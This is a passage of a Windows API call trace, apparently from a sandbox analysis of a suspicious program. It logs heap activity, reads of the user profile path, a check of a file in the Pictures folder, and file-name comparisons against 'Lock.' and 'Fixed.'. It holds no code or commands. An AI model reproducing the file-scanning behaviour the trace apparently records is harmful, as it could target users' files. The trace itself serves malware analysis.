lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0208.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.790] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0208.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0208.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0208.791] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0208.791] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0208.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaea0 [0208.793] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/619JnEBOuc.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\619JnEBOuc.bmp", lpFilePart=0x8cf650*="619JnEBOuc.bmp") returned 0x27 [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaea0 | out: hHeap=0x2af0000) returned 1 [0208.793] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\619JnEBOuc.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\619jnebouc.bmp")) returned 0xffffffff [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.793] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0208.793] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.793] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0208.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0208.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0208.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6MclNK.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MclNK.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="clNK.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lNK.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NK.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.794] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0208.794] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0208.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0208.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0208.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0208.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0208.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7040 [0208.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0208.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6MclNK.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MclNK.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="clNK.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lNK.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.795] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NK.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0208.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0208.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0208.795] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0208.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.796] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0208.796] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0208.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0208.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0208.796] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0208.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0208.796] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.797] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0208.797] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0208.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73068 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0208.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0208.798] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0208.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0208.798] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0208.798] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0208.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0208.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0208.798] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0208.799] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 